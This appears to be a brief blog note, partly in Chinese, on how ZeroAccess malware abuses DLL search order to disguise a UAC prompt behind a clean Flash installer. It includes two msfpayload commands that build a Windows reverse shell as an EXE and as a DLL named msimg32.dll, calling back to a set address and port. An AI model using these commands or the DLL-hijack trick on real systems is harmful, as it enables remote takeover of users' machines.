http://journeyintoir.blogspot.tw/2013/03/uac-impact-on-malware.html
msfpayload windows/shell_reverse_tcp LHOST=192.168.71.128 LPORT=4444 X >./msimg32.exe產生一個反連shell的exe 使用x參數
msfpayload windows/shell_reverse_tcp LHOST=192.168.71.128 LPORT=4444 D >./msimg32.dll
產生一個反連shell的dll 使用d參數
msimg32.dll in the Temp directly was loaded before the legitimate DLL in the System32 directory.
這個dll會被InstallFlashPlayer.exe 載入 所以就fuck uac了
ZeroAccess disguises itself by forcing the UAC popup to appear to come from a different, benign-seeming program. A clean copy of the Adobe Flash Installer (InstallFlashPlayer.exe) is dropped to a temporary directory and the DLL load order of Windows is abused to ensure that ZeroAccess is loaded into the clean file’s process address space when it is executed.
By dropping a DLL called msimg32.dll (one of the DLLs that InstallFlashPlayer.exe imports) into the same directory as the Flash installer file, Windows will load this DLL in preference to the genuine msimg32.dll because Windows looks in the current directory before the system directory when loading DLLs:”
沒有留言:
張貼留言